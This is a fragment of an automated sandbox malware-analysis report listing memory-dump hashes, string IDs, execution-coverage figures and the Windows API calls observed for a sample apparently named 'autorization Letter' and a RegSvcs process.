• Opcode Fuzzy Hash: 449e675386f93e7636a5df1ba7fb28a7f4525feecd3e14dd7e967169d7b88797
• Instruction Fuzzy Hash: 88D01276DA97830FE712263598042683EB0AB372D578C00E28010D515FFA194494D322
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                                                  • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                                                                  • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                                                  • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3631f2d15d6023ecc873328bf911cb2e2f20488e309a7fb33310b66cf784668f
                                                                  • Instruction ID: 23fa2bdbaf5a155ebc697532fb5d70b785f56e3277df76ae959b2ab0cf117374
                                                                  • Opcode Fuzzy Hash: 3631f2d15d6023ecc873328bf911cb2e2f20488e309a7fb33310b66cf784668f
                                                                  • Instruction Fuzzy Hash: B4C080867057C01AEF4755750818444193785CA400FCF94D54C81CE262D0DDCC450321
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64b08f306fecc5059d47c7496ca6ab2798b6e5fbfede51ffbfd17f8dd9c15bd7
                                                                  • Instruction ID: 1c9be3a76ee7aa6b49f0faebe9d835d582b482c95b06e4df37bd6c78151e3b26
                                                                  • Opcode Fuzzy Hash: 64b08f306fecc5059d47c7496ca6ab2798b6e5fbfede51ffbfd17f8dd9c15bd7
                                                                  • Instruction Fuzzy Hash: BEB09B2231433D13DA0971DD64146FD728E4785564F000067951DD77415CD59C4103DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                  • Instruction ID: aaae3fb2ea0c4738b2ab52d8b83c9c30d9afddb35997d4b89c841ed032a14f7b
                                                                  • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                  • Instruction Fuzzy Hash: 69B0923BA0401C89EF008A84B4423EEF760E780269F104023C6119204193B2016496D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5850c4b38b810ca4f3d013a0f0b2b06e0d88a926151f3524c0b1e7985c98373c
                                                                  • Instruction ID: 3b97a18c23a5373eb9a9cb3b29cc394b763a148fc36703396ca8ad942de085c3
                                                                  • Opcode Fuzzy Hash: 5850c4b38b810ca4f3d013a0f0b2b06e0d88a926151f3524c0b1e7985c98373c
                                                                  • Instruction Fuzzy Hash: 0AB0121A754905017D04F9390CDC576001B9EC0200BC0EC141D01C012C89ACAC08000A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41b34e40c38c8ffc8a6cc00e245f5b0136cee5887393d406b374cd955879a816
                                                                  • Instruction ID: 12b5c534ede09141c160d17cd5f91cfb092a540a736bca00c9dd015e67ac8c36
                                                                  • Opcode Fuzzy Hash: 41b34e40c38c8ffc8a6cc00e245f5b0136cee5887393d406b374cd955879a816
                                                                  • Instruction Fuzzy Hash: BF328BB0B006059FDB14DB79C494BAEB7FAAF88304F1484A9D559EB3A1CB34EC45CB61
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14194782d0a9585a3fe048f1e886148308a47e5b2079804f440e97ca0297105e
                                                                  • Instruction ID: 0af50e97110ded099647113ce15aca95aad3663e0c815e254b012664001cf949
                                                                  • Opcode Fuzzy Hash: 14194782d0a9585a3fe048f1e886148308a47e5b2079804f440e97ca0297105e
                                                                  • Instruction Fuzzy Hash: FAE108B4E001198FDB14DFA9C5809AEFBB2FF89305F248269D414AB356D735AD41CF61
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b29609f88b44e184bcef1793128150f8e16c79f3a6fed261bde973e24fe03ae
                                                                  • Instruction ID: 62b4449510532bee1a35a9be40e91717bd43292e167d01bad814d59eb92d99b3
                                                                  • Opcode Fuzzy Hash: 2b29609f88b44e184bcef1793128150f8e16c79f3a6fed261bde973e24fe03ae
                                                                  • Instruction Fuzzy Hash: 82A16C36A102158FCF05DFB8CD905DEBBB2FF89300B1585AAE901AB275DB719996CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 872002458dadbe20d227b0004282b49ea4f29dbc79f56bb431408788a508eafe
                                                                  • Instruction ID: fb8530d1765fad62823b6f062edf9b3ef988a31cdc1348d312545ce116f8c91f
                                                                  • Opcode Fuzzy Hash: 872002458dadbe20d227b0004282b49ea4f29dbc79f56bb431408788a508eafe
                                                                  • Instruction Fuzzy Hash: 655150B0E042598FDB15CFA9C9805AEBBF2FF85314F1481AAD418AB256D7349E41CF61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-2711123852
                                                                  • Opcode ID: 89a94903aaa78b5f19de0bbbe17be32270c3279a610961f03ea7493f18881f3f
                                                                  • Instruction ID: 1c31778c78d2b9ec475bd09839c6a9811a0205be5a422557eb998b8cdfedc6a4
                                                                  • Opcode Fuzzy Hash: 89a94903aaa78b5f19de0bbbe17be32270c3279a610961f03ea7493f18881f3f
                                                                  • Instruction Fuzzy Hash: 0A125470A1021A8FCB5CEF78E990A9D7BB2FF94704F504568C049AB264DF746D85CFA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-2711123852
                                                                  • Opcode ID: 5c4d1de71c895733db4a98e73bb73daf4347772f8a311954e4f54abef5dd3f83
                                                                  • Instruction ID: 25a641c259cd0ea0cfcde4623e49084dd71f0f12c208eb2c98e43facf8199677
                                                                  • Opcode Fuzzy Hash: 5c4d1de71c895733db4a98e73bb73daf4347772f8a311954e4f54abef5dd3f83
                                                                  • Instruction Fuzzy Hash: 17124470A1021A8FCB5CEF78E990A9D7BB2FF94704F504568C049AB264DF746D85CFA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: 8a380f5fef8db3aa1b157153d03fad902c94d635f0f211858eac0d6317b35603
                                                                  • Instruction ID: 46c4c8fa2ec2ed6f7d675bcb27146ad5f3bb5076dbc094698e4945d98ee4a1f6
                                                                  • Opcode Fuzzy Hash: 8a380f5fef8db3aa1b157153d03fad902c94d635f0f211858eac0d6317b35603
                                                                  • Instruction Fuzzy Hash: D5717E31E0020B8FCB18EFB9D8905DDBBB2FF95300F614629D055AB264EB747986CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: 79a2259006f7982b81ad35308c34f4e515a5cf953739763d0d125490a4b93d16
                                                                  • Instruction ID: 1024dbd8e4eadda77cba3af397b822c8b9304a847137137580878e6b919ff4b5
                                                                  • Opcode Fuzzy Hash: 79a2259006f7982b81ad35308c34f4e515a5cf953739763d0d125490a4b93d16
                                                                  • Instruction Fuzzy Hash: 13717F30E0020B8BCB18EFB9D9505DDBBB2FF95700F614618D055AB264DB747985CB91

                                                                  Execution Graph

                                                                  Execution Coverage:11%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:142
                                                                  Total number of Limit Nodes:15
                                                                  execution_graph: rendered call graph (node and edge list not reproduced as text). Functions in the graph reach the following APIs: CallWindowProcW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle, CreateWindowExW, DeleteFileW, GetModuleHandleW, and GlobalMemoryStatusEx (called three times in succession at two separate sites).

                                                                  Control-flow Graph

                                                                  control_flow_graph: rendered basic-block graph for 5e127fa-5e129cd with executed / not executed block colouring (not reproduced as text). Blocks call GetCurrentProcess, GetCurrentThread, GetCurrentProcess again, GetCurrentThreadId, and a sub-function at 5e129d0.
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E1287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E128BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E128F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E12951
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: e845fce9ac1678d79c5db7bea06704b3e78e4559ac87d745196ae798b5dd7aef
                                                                  • Instruction ID: d75f54a8a62fe81be684340a9c70bc6dfc7c34ca57af0c7e185af7921513d232
                                                                  • Opcode Fuzzy Hash: e845fce9ac1678d79c5db7bea06704b3e78e4559ac87d745196ae798b5dd7aef
                                                                  • Instruction Fuzzy Hash: D05156B49002498FDB14DFAAD948BEEBBF1FF88314F24845AE509A7360DB385944CB65

                                                                  Control-flow Graph

                                                                  control_flow_graph: rendered basic-block graph for 5e12800-5e129cd with executed / not executed block colouring (not reproduced as text). Blocks call GetCurrentProcess, GetCurrentThread, GetCurrentProcess again, GetCurrentThreadId, and a sub-function at 5e129d0.
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E1287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E128BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E128F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E12951
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: c787952447c15bfe130b28585f28cdf4a0120d37e016f39ebf921f2008ed260b
                                                                  • Instruction ID: 2e8c1d0e2c55e0b84d1b4e3c01c4bd99d04454caf4139fef700329a0c91881b0
                                                                  • Opcode Fuzzy Hash: c787952447c15bfe130b28585f28cdf4a0120d37e016f39ebf921f2008ed260b
                                                                  • Instruction Fuzzy Hash: 895157B09003498FDB14DFAAD948BDEBBF1FF88314F24805AE509A7360DB345944CB65
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E1AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: bf67c02840f3cba49532e1053fdd115fd30abece59b8dbd3308486c7b8fee283
                                                                  • Instruction ID: 515a8942cf576930536b9a9d8746012fc13f66fcc0bd84745c715bd1ce926db6
                                                                  • Opcode Fuzzy Hash: bf67c02840f3cba49532e1053fdd115fd30abece59b8dbd3308486c7b8fee283
                                                                  • Instruction Fuzzy Hash: DA815AB0A01B058FD724DF29D0447AABBF5FF88304F00892ED896D7A50D774E845CB98
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212567405.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8ccb44f136d6ffc269342f08f19e79c04987780f3947685d45d3b837e02b9a2
                                                                  • Instruction ID: a4274ac28b35084e1d583f172e7f42346ad1fdeed1b15fb639e3ca8c3c5f5787
                                                                  • Opcode Fuzzy Hash: c8ccb44f136d6ffc269342f08f19e79c04987780f3947685d45d3b837e02b9a2
                                                                  • Instruction Fuzzy Hash: FE413571E147658FCB14CF69C8042EEBFF5AF89210F14856AD448A7241EB38D845CBD1
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E1D022
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: a226a8a390e15eb80fc840a2b0c141c41c6bb2b608867fd9fb21ba646f473c66
                                                                  • Instruction ID: e4d911477ee708d43590f9a381b709598e5aae1dbf137bf05af711b7d6fcec0f
                                                                  • Opcode Fuzzy Hash: a226a8a390e15eb80fc840a2b0c141c41c6bb2b608867fd9fb21ba646f473c66
                                                                  • Instruction Fuzzy Hash: B851D1B1C00349DFDB14CFA9C984ADEBBB6FF48314F64812AE819AB210D7749885CF95
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E1D022
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 37a99427063c82129c1afa5f86d0995554d7557e61aa077f60d6e0c0f9a25abe
                                                                  • Instruction ID: e01872e18e0b888095bc86bf2986d93a8dc68e1dc43b14b08ec864df86d2d923
                                                                  • Opcode Fuzzy Hash: 37a99427063c82129c1afa5f86d0995554d7557e61aa077f60d6e0c0f9a25abe
                                                                  • Instruction Fuzzy Hash: A841E2B1C00309DFDB14CFA9C984ADEBBB6FF48304F64812AE819AB210D7749885CF94
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E1F711
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 701560f265e3d8425dc5bf344e03d198f8c3dc2f28f704aa86e2fb7e70fee7cd
                                                                  • Instruction ID: 47da82884269dd5ae229f8da0e54a4377cc217466d86153f9a2e32025d6d3801
                                                                  • Opcode Fuzzy Hash: 701560f265e3d8425dc5bf344e03d198f8c3dc2f28f704aa86e2fb7e70fee7cd
                                                                  • Instruction Fuzzy Hash: CE4127B9900205DFDB14CF99C888AAABBF6FF88314F248459D559AB321D774A841CFA4
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E12ACF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 8f1dadee99be8bf09e0498d4d5ae7c154b752162aeebf7219654dabce980283f
                                                                  • Instruction ID: d1c6a39ba9e4e677372e2f140b115a4af2e1fdf9282a976f3c6593587b0fe7c4
                                                                  • Opcode Fuzzy Hash: 8f1dadee99be8bf09e0498d4d5ae7c154b752162aeebf7219654dabce980283f
                                                                  • Instruction Fuzzy Hash: 5521E2B5D002489FDB10CFAAD984ADEBBF5FB48310F14841AE958A7250D378A950CFA5
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E12ACF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: a5a1883987de540a19fff5d868bdb2021e53a39dfa8db689fdb036cfd28c281c
                                                                  • Instruction ID: cd879dba704fb96e0648a747d102d376c6bc4c6ec4430800fb48d471bd9e0415
                                                                  • Opcode Fuzzy Hash: a5a1883987de540a19fff5d868bdb2021e53a39dfa8db689fdb036cfd28c281c
                                                                  • Instruction Fuzzy Hash: D821C2B5D002489FDB10CFAAD984ADEBBF9FB48310F14841AE958A7350D378A954CFA5
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 00D273C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203908369.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: b37cc6775fc2a2d5aa355228f31b7bcaa34f2757f1038301f7782a99b332f53f
                                                                  • Instruction ID: 0f644cd2ba34df6368f90856236b3c952a3148fe778035119c03b9071b882b63
                                                                  • Opcode Fuzzy Hash: b37cc6775fc2a2d5aa355228f31b7bcaa34f2757f1038301f7782a99b332f53f
                                                                  • Instruction Fuzzy Hash: 442147B1C0066A9BCB20DF9AD4456AEFBB4EF48314F14816AD828A7640D778A944CFE5
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 00D273C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203908369.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: d22abf089dc8a92df569b565ecd9f674e29d08045c507bab51007a4f03bae3ad
                                                                  • Instruction ID: 15f82c00ef6a0e44745ec017930e82478b2e3cf051b013850a9eb8885677f5e9
                                                                  • Opcode Fuzzy Hash: d22abf089dc8a92df569b565ecd9f674e29d08045c507bab51007a4f03bae3ad
                                                                  • Instruction Fuzzy Hash: 231147B1C006599BCB10DF9AD544BAEFBF4FF48320F14816AD818A7240D778A940CFE5
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E2E562), ref: 05E2E64F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212567405.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: cfb3196f5454ea6fb3ac98d0db992b860827b08d363b193c71bb8633a60b4aa8
                                                                  • Instruction ID: 728c91f98184a2cc58238d237fd8281e36ecff2ff1eb0d33119e2e99376557eb
                                                                  • Opcode Fuzzy Hash: cfb3196f5454ea6fb3ac98d0db992b860827b08d363b193c71bb8633a60b4aa8
                                                                  • Instruction Fuzzy Hash: 4A1103B1C006699BCB10DF9AC445AEEFBF8EF48314F14816AE918A7240D778A950CFE5
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E2E562), ref: 05E2E64F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212567405.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e20000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: cbdb65f9b856470239f0c09fc43c8d7874248f952fceb7d3ea8cfe458061fd82
                                                                  • Instruction ID: 6782f40f882abf0daf7c8e72a9976f8395af920bd23a167ec9e87978f4b7a09d
                                                                  • Opcode Fuzzy Hash: cbdb65f9b856470239f0c09fc43c8d7874248f952fceb7d3ea8cfe458061fd82
                                                                  • Instruction Fuzzy Hash: 0A1142B1C006699BCB10DF9AC545BEEFBB4BF48320F10812AD818B7240D738A940CFA5
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E1AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2212452877.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5e10000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 5006c753d94efd5652ee06bbe3f41b9b350c01361d6127f7bf2c7bba673c6148
                                                                  • Instruction ID: 7ea817e511077c1c563b5c1ec332140a30c5d5ca10cf0087a1bf16c7fd2b53a9
                                                                  • Opcode Fuzzy Hash: 5006c753d94efd5652ee06bbe3f41b9b350c01361d6127f7bf2c7bba673c6148
                                                                  • Instruction Fuzzy Hash: F71110B5C003498FDB10CF9AC444ADEFBF5EF88324F10842AD869A7200C379A545CFA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203661039.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_ccd000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93dfb0b033979247e61bbd8bc579661056997c52e3a7de8886882d111240fde2
                                                                  • Instruction ID: 69f195ed6c97e046ec60a0b4e28a8b510467c5739bb30a03304688397a158e93
                                                                  • Opcode Fuzzy Hash: 93dfb0b033979247e61bbd8bc579661056997c52e3a7de8886882d111240fde2
                                                                  • Instruction Fuzzy Hash: 1121D071604204DFCB14DF28D9C4F26BBA5FB88314F20C5BDE94A4B296C33AD847CA62
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2203661039.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_ccd000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab36d4c3a216d478ff4fd5ac5fbae3ecc547271dbd30c8bb73cb77cb3bedfa53
                                                                  • Instruction ID: 32d6d4d748bfdceb12833aee33b8526f8d40e862054f384d178cf8f31178ec30
                                                                  • Opcode Fuzzy Hash: ab36d4c3a216d478ff4fd5ac5fbae3ecc547271dbd30c8bb73cb77cb3bedfa53
                                                                  • Instruction Fuzzy Hash: EF2183755093808FD702CF24D594B15BF71EB46314F28C5EED8498B6A7C33A980ACB62

                                                                  Execution Graph

                                                                  Execution Coverage:8.6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:38
                                                                  Total number of Limit Nodes:7
